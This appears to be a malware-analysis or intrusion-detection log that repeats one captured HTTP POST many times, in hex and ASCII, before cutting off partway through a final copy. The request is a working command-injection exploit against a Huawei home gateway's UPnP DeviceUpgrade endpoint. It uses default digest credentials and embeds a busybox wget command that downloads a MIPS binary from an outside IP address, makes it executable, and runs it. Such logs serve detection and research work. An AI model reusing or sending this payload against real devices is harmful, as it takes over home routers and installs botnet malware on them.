              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 